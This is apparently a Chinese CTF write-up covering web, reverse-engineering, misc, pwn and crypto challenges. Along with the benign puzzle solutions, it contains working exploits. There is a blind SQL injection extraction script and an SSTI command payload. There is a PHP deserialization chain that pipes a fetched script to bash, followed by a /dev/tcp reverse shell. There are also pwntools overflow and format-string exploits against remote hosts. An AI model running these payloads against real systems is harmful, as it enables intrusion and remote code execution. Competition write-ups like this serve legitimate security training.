Once a year.
WEB
0x00 Welcome2021
WELCOME /f1111aaaggg9.php HTTP/1.1
Host: 1.14.102.22:8011
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
0x01 babysql
The one I wanted to use isn't filtered, nice~
admin'^1^1#
Response: your uname:admin and your pwd:123456
admin'^0^1#
Response: wrong username or password
Use admin'^(length(database())=7)^1#
This shows that the database name is 7 characters long.
Dump the database name, which turns out to be babysql:
import requests

url = r"http://47.100.242.70:4339/index.php"
#admin^(ord(substr(database(),1,1))=199)^1
payload1 = "admin'^(ord(substr(database(),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""
for i in range(1,8):
    for j in range(23,123):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'uname':payload,'pwd':'shaw'}
        # print(payload)
        s = requests.post(url,data=data).text
        if ("admin" in s):
            name += chr(j)
            print(name)
            break
Use admin'^((select(length(group_concat(TABLE_NAME)))from(information_schema.tables)where(table_schema="babysql"))=14)^1#
This shows the concatenated table names are 14 characters long; dumping them gives jeff,jeffjokes:
payload1 = "admin'^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='babysql')),"
payload2 = ",1))="
payload3 = ")^1#"
Next dump the column names. First check the length of jeff's column list, which is 23: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeff"))=23)^1#
The column list of jeffjokes has length 31: admin'^((select(length(group_concat(COLUMN_NAME)))from(information_schema.columns)where(table_name="jeffjokes"))=31)^1#
Not sure which one to use; I tried both and nothing fit, so I suspected I had dumped the wrong database, and it turned out I really had, haha ^^:
payload1 = "admin'^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),"
payload2 = ",1))="
payload3 = ")^1#"
Adjusting the query gives a database named flag, with table fllag and column fllllllag, whose value is 22 characters long: admin'^((select(length(group_concat(fllllllag)))from(flag.fllag))=22)^1#
Finally dump the value:
import requests
import time

url = r"http://47.100.242.70:4339/index.php"
#admin'^(ord(substr((select(fllllllag)from(fllag)),1,,1))=103)^1#
payload1 = "admin'^(ord(substr((select(fllllllag)from(flag.fllag)),"
payload2 = ",1))="
payload3 = ")^1#"
name = ""
for i in range(1,26):
    for j in range(23,130):
        payload = payload1+str(i)+payload2+str(j)+payload3
        data = {'uname':payload,'pwd':'shaw'}
        # print(payload)
        s = requests.post(url,data=data).text
        if ("admin" in s):
            name += chr(j)
            print(name)
            time.sleep(1)
            break
0x02 babyxss
Just think it through and construct the payload:
'<script>console.log("'+"<script>alalertert(1)</script>+'");</script>';
0x03 Baby_PHP_Black_Magic_Enlightenment
Level 1: write the number in scientific notation to bypass the check.
Level 2: bypass with a SHA-1 collision pair found via Google:
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1& b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
Level 3: double URL encoding.
0x04 babyPy
SSTI:
{{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
0x05 babyphp
Visiting noobcurl.php already hints that the flag is in the root directory, and there are no real restrictions:
http://47.100.242.70:4659/noobcurl.php?url=file://127.0.0.1/../../../../../../../flag
0x06 蜜雪冰城甜蜜蜜 (Sweet Mixue Bingcheng)
Press F12 and change the id to 9.
0x07 babyPOP
The challenge code is as follows:
<?php
class a
{
    public static $Do_u_like_JiaRan = false;
    public static $Do_u_like_AFKL = false;
}

class b
{
    private $i_want_2_listen_2_MaoZhongDu;

    public function __toString()
    {
        if (a::$Do_u_like_AFKL) {
            return exec($this->i_want_2_listen_2_MaoZhongDu);
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

class c
{
    public function __wakeup()
    {
        a::$Do_u_like_JiaRan = true;
    }
}

class d
{
    public function __invoke()
    {
        a::$Do_u_like_AFKL = true;
        return "关注嘉然," . $this->value;
    }
}

class e
{
    public function __destruct()
    {
        if (a::$Do_u_like_JiaRan) {
            ($this->afkl)();
        } else {
            throw new Error("Noooooooooooooooooooooooooooo!!!!!!!!!!!!!!!!");
        }
    }
}

if (isset($_GET['data'])) {
    unserialize(base64_decode($_GET['data']));
} else {
    highlight_file(__FILE__);
}
From the analysis: class c sets a::$Do_u_like_JiaRan = true as soon as it is unserialized (in __wakeup).
Class b can run a system command, but only inside the magic method __toString(), which fires when the object is used as a string.
Only class d outputs class b as a string, but class d in turn has to be called as a function.
Class e calls class d as a function.
All that remains is to chain class c to the rest: put class e inside class c.
<?php
class b
{
    private $i_want_2_listen_2_MaoZhongDu;
    public function __construct()
    {
        $this->i_want_2_listen_2_MaoZhongDu = 'curl http://ip:port/testdel|bash';
    }
}
class c
{
    public $shawroot;
    public function __construct()
    {
        $this->shawroot = new e();
    }
}
class d
{
    public $value;
    public function __construct()
    {
        $this->value = new b();
    }
}
class e
{
    public $afkl;
    public function __construct()
    {
        $this->afkl = new d();
    }
}
$data = new c();
echo base64_encode(serialize($data));
?>
On a public VPS, testdel has the following content; the listener must of course be running before the target is made to curl it:
bash -i >& /dev/tcp/ip/port 0>&1
REVERSE
0x00 easypyc
Use pyinstxtractor.py to extract the pyc, then uncompyle6 to recover the .py file, whose content is:
# uncompyle6 version 3.8.0
# Python bytecode 3.8.0 (3413)
# Decompiled from: Python 3.8.10 (default, Sep 28 2021, 16:10:42)
# [GCC 9.3.0]
# Embedded file name: easypyc.py
whatbox = [0] * 256

def aaaaaaa(a, b):
    k = [0] * 256
    t = 0
    for m in range(256):
        whatbox[m] = m
        k[m] = ord(a[(m % b)])
    else:
        for i in range(256):
            t = (t + whatbox[i] + k[i]) % 256
            temp = whatbox[i]
            whatbox[i] = whatbox[t]
            whatbox[t] = temp

def bbbbbbbbbb(a, b):
    q = 0
    w = 0
    e = 0
    for k in range(b):
        q = (q + 1) % 256
        w = (w + whatbox[q]) % 256
        temp = whatbox[q]
        whatbox[q] = whatbox[w]
        whatbox[w] = temp
        e = (whatbox[q] + whatbox[w]) % 256
        a[k] = a[k] ^ whatbox[e] ^ 102

def ccccccccc(a, b):
    for i in range(b):
        a[i] ^= a[((i + 1) % b)]
    else:
        for j in range(1, b):
            a[j] ^= a[(j - 1)]

if __name__ == '__main__':
    kkkkkkk = 'Geek2021'
    tttttt = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165, 136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]
    ssss = input('Please input your flag:')
    inp = [0] * len(ssss)
    if len(ssss) != 32:
        print('Length Error!!!!')
        exit(0)
    for i in range(len(ssss)):
        inp[i] = ord(ssss[i])
    else:
        aaaaaaa(kkkkkkk, len(kkkkkkk))
        bbbbbbbbbb(inp, 32)
        ccccccccc(inp, 32)
        for m in range(32):
            if tttttt[m] != inp[m]:
                raise Exception('sorry your flag is wrong')
        print('success!!!!!!')
        print('your flag is {}'.format(ssss))
Then I got stuck; see this reference.
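As an added example (my own code, not from the write-up or the reference it points to), the decompiled check above is RC4 (aaaaaaa is the key schedule, bbbbbbbbbb the keystream XOR with an extra ^ 102) followed by two chained XOR passes (ccccccccc); every step is invertible, so the expected bytes can be walked backwards to the input. All constants come from the decompiled source.

```python
TARGET = [117, 62, 240, 152, 195, 117, 103, 74, 240, 151, 173, 162, 17, 75, 141, 165,
          136, 117, 113, 33, 98, 151, 174, 4, 48, 25, 254, 101, 185, 127, 131, 87]
KEY = "Geek2021"

def rc4_keystream(key: str, length: int) -> list:
    """aaaaaaa (KSA) followed by the PRGA inside bbbbbbbbbb; returns raw keystream bytes."""
    s = list(range(256))
    k = [ord(key[m % len(key)]) for m in range(256)]
    t = 0
    for i in range(256):
        t = (t + s[i] + k[i]) % 256
        s[i], s[t] = s[t], s[i]
    out, q, w = [], 0, 0
    for _ in range(length):
        q = (q + 1) % 256
        w = (w + s[q]) % 256
        s[q], s[w] = s[w], s[q]
        out.append(s[(s[q] + s[w]) % 256])
    return out

def chain_xor(a: list) -> list:
    """ccccccccc: a[i] ^= a[(i+1) % n] for every i, then a[j] ^= a[j-1] for j >= 1."""
    a, n = a[:], len(a)
    for i in range(n):
        a[i] ^= a[(i + 1) % n]
    for j in range(1, n):
        a[j] ^= a[j - 1]
    return a

def unchain_xor(a: list) -> list:
    """Inverse of chain_xor: undo the two passes in reverse order, walking backwards."""
    a, n = a[:], len(a)
    for j in range(n - 1, 0, -1):
        a[j] ^= a[j - 1]
    for i in range(n - 1, -1, -1):
        a[i] ^= a[(i + 1) % n]
    return a

def check(flag: str, key: str = KEY) -> list:
    """The program's forward transform, so any candidate can be compared with TARGET."""
    ks = rc4_keystream(key, len(flag))
    return chain_xor([ord(ch) ^ k ^ 102 for ch, k in zip(flag, ks)])

def solve(target: list, key: str = KEY) -> str:
    """Run the transform backwards: unchain, then strip the keystream byte and the 102."""
    ks = rc4_keystream(key, len(target))
    return "".join(chr(v ^ k ^ 102) for v, k in zip(unchain_xor(target), ks))

if __name__ == "__main__":
    print(solve(TARGET))
```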
MISC
0x00 What is this command
From the challenge description:
cat flag.png | base64 | base64 | tac | nl | sort -k 2 > flag.txt ;rm -f flag.png & nohup php -S 0.0.0.0:2333 >> /dev/null 2>&1 &
Visiting flag.txt gives the following:
Since the lines were helpfully numbered, just put them back in numeric order.
sort -n -t ' ' -k 1 t.txt > t2.txt
Then run tac once more and decode Base64 twice to get an image, which is the flag.
0x01 easysend
Install MetaMask and follow the tutorial.
0x02 easycreat
(1) First go to Remix: https://remix.ethereum.org
(2) Once Remix has opened, click the example contract "ballot.sol" on the left.
(3) Go to the example contract's page on GitHub: link here.
(4) Copy the entire example contract and replace the contract contents in Remix with it.
(5) Under the SOLIDITY COMPILER menu, click Compile 3_Ballot.sol.
(6) Under the DEPLOY & RUN TRANSACTIONS menu, click Deploy; before deploying, switch the environment to Injected Web3.
(7) MetaMask pops up a dialog; click confirm.
(8) Wait for the link to be generated.
0x03 每日一溜 (One a Day)
Filter on http and extract an image of Yuno (由乃) cupping her face; a zip is appended at its end. Opening it gives:
vwxrstuopq34567ABCDEFGIHJyz021PQRSTKNMLOZabcdUVWXYefghijklmn89+/
FhMrPh94JHqS2jGQGM6QCsaDzI6ZyHqQQB==
Decode it with an online custom-alphabet Base64 decoder to get the flag.
PWN
0x00 恋爱小游戏 (Love Mini-game)
So simple that even I was surprised: just type in 123.
0X01 恋爱小游戏2.0 (Love Mini-game 2.0)
IDA 7.5 strips the obfuscation automatically; main is:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[24]; // [rsp+0h] [rbp-20h] BYREF
  char s2[8]; // [rsp+18h] [rbp-8h] BYREF

  strcpy(s2, "hateyou");
  init(argc, argv, envp);
  puts(&s);
  read(0, buf, 0x20uLL);
  if ( !strcmp(love, s2) )
  {
    puts(&byte_402074);
    system("/bin/sh");
    exit(0);
  }
  puts(&byte_402098);
  return 0;
}
Make it equal loveyou:
from pwn import *
from struct import pack

elf = ELF('./pwn111')
local = 0
if local == 1:
    io = process('./pwn111')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('47.242.20.238',10000)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

payload = 'a'*(0x20-0x8)+'loveyou\x00'+p64(0xdeadbeef)
io.recvuntil("\n")
io.recvuntil("\n")
io.sendline(payload)
io.interactive()
0x02 check in
Just loop the calculation 200 times; nothing difficult:
from pwn import *
from struct import pack

elf = ELF('./math')
local = 0
if local == 1:
    io = process('./math')
    #gdb.attach(io,'b * 0x400A2A')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('123.57.230.48',12343)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

for i in range(1,201):
    io.recvuntil("num1:")
    num1 = io.recvuntil("\n")[:-1]
    io.recvuntil("num2:")
    num2 = io.recvuntil("\n")[:-1]
    io.recvuntil("The sign of this calculation is ")
    function = io.recvuntil("\n")[:-1]
    calc = str(eval(num1+function+num2))
    io.recvuntil("Give me your answer!!:\n")
    io.sendline(calc)
io.interactive()
0x03 easyfmt
main contains nothing useful. vuln is:
int vuln()
{
  char v1[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char format[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  int v3; // [esp+4Ch] [ebp-Ch] BYREF

  v3 = 666;
  puts("First step:");
  printf("%p\n", &v3);
  __isoc99_scanf("%13s", format);
  printf(format);
  if ( v3 != 12 )
    exit(0);
  puts("Second Step");
  puts("nice you enter there");
  __isoc99_scanf("%20s", v1);
  return printf(v1);
}
Besides vuln there is also a backdoor function, so the plan is: first make v3 = 0xC to satisfy the check, then make the return address point at the backdoor.
Step one is finding which argument index is controllable. Testing shows it is the 15th, as shown in the figure:
p32(v3) is 4 bytes by itself; adding 8 gives 12 (0xC). %8c prints 8 characters of padding.
from pwn import *
from LibcSearcher import *

elf = ELF('./format_string')
local = 1
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048634')
    #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    io = remote('node4.buuoj.cn',26933)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload = p32(v3)+"%8c%15$n"
io.sendline(payload)
io.interactive()
Next the return address has to be redirected to the backdoor. Testing shows the 7th argument is controllable.
Set a breakpoint at the last printf in vuln; the stack shows that the return address into main lies 0x10 (0xac-0x9c) above v3:
We want it to jump to 0x08048793 (backdoor); it is currently 0x804873e, so only the last byte needs to become 93. 0x93 is 147 in decimal, and since p32(v3+0x10) already occupies 4 bytes, 143 more are added. Use hhn to write a single byte (n writes an int, ln a long int, hn a word). The final payload:
from pwn import *
from LibcSearcher import *

elf = ELF('./format_string')
local = 0
if local == 1:
    io = process('./format_string')
    #gdb.attach(io,'b * 0x08048685')
else:
    io = remote('123.57.230.48',12342)
    libc = ELF('./libc/libc-2.23-0ubuntu11.so')

io.recvuntil("First step:\n")
v3 = int(io.recvuntil("\n",drop=True),16)
log.success('v3: '+hex(v3))
payload1 = p32(v3)+"%8c%15$n"
io.sendline(payload1)
io.recvuntil("there\n")
payload2 = p32(v3+0x10)+"%143c%7$hhn"
io.sendline(payload2)
io.interactive()
CRYPTO
0x00 Classical music
Vigenère in one go; the key is flag.
0x01 三个也可以 (Three Also Work)
from Crypto.Util.number import getPrime,bytes_to_long
from flag import flag

flag = bytes_to_long(flag)
p = getPrime(100)
q = getPrime(100)
r = getPrime(100)
n = p*q*r
e = 65537
c = pow(flag, e, n)
print(n)
print(c)
'''
798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807
249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
'''
Factor n with yafu into its three primes (no screenshot ^^); (p-1)*(q-1)*(r-1) is:
798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712
Compute d:
gmpy2.invert(65537, 798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712)
# gives mpz(40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929)
Compute the plaintext:
#flag = pow(c, d, n)
pow(249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575, 40300244384284458664389035512497982223263215867565711201073618351763565714690247279940929, 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807)
Result:
0x5359437b6e6f775f796f755f736f6c76655f69747d
As text: SYC{now_you_solve_it}
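As an added example (my own code, not from the write-up), the steps above are carried through end to end with only the standard library, using the n, c and phi values quoted in this section: once phi = (p-1)(q-1)(r-1) is known, the number of primes no longer matters, and the reason the challenge falls is that three 100-bit factors are small enough for yafu.

```python
# Values quoted in the write-up: n and c from the challenge, phi from the yafu factors.
N = 798898099277934230940128318327632478801901355882614385038310680236381399664973004454688807
C = 249128262668727227416761229197781088291962817031744463346178556057415901512114944554308575
PHI = 798898099277934230940128318325039401381125643772732611913116069546136964985981468840135712
E = 65537

def private_exponent(e: int, phi: int) -> int:
    """d = e^-1 mod phi, the same formula whether n has two primes or three."""
    d = pow(e, -1, phi)  # Python 3.8+ modular inverse; raises ValueError if gcd(e, phi) != 1
    assert (e * d) % phi == 1
    return d

def decrypt(c: int, d: int, n: int) -> bytes:
    """m = c^d mod n, converted back to the bytes that bytes_to_long() started from."""
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")

def bits_per_prime(n: int, prime_count: int = 3) -> int:
    """Rough factor size: with three equal-sized primes each is about a third of n's bits."""
    return n.bit_length() // prime_count

if __name__ == "__main__":
    d = private_exponent(E, PHI)
    print(hex(d))
    print(decrypt(C, d, N))
    print("approx. bits per prime:", bits_per_prime(N))
```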